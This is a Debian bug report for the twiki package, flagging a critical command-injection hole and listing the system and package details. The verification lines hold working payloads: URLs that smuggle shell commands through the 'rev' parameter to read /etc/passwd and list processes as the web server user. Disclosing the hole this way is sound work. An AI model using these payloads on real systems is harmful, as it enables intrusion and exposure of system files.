Package: twiki Version: 20030201-6 Severity: critical Justification: root security hole
Please see http://www.securityfocus.com/archive/1/410721 Verified with http://iw/iw/view/Main/TWikiUsers?rev=3D2%20%7Cless%20/etc/passwd http://iw/iw/view/Main/TWikiUsers?rev=3D2%20%7Cps%20aux|cat%20--%20-%20 that it allows access as www-data, the apache user. -- System Information: Debian Release: 3.1 Architecture: i386 (i686) Kernel: Linux 2.6.8-spb0.3 Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968) Versions of packages twiki depends on: ii apache-common 1.3.33-6sarge1 support files for all Apache webse ii debconf 1.4.30.13 Debian configuration management sy ii libalgorithm-diff-perl 1.19.01-1 a perl library for finding Longest ii libdigest-sha1-perl 2.10-1 NIST SHA-1 message digest algorith ii perl [libmime-base64-perl 5.8.4-8 Larry Wall's Practical Extraction ii perl-modules [libnet-perl 5.8.4-8 Core Perl modules ii rcs 5.7-15 The GNU Revision Control System -- debconf information: * twiki/apacheUserCreationNote: * twiki/samplefiles: true * twiki/wikiwebmaster: [EMAIL PROTECTED] * twiki/defaultUrlHost: http://iw.maths.usyd.edu.au -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]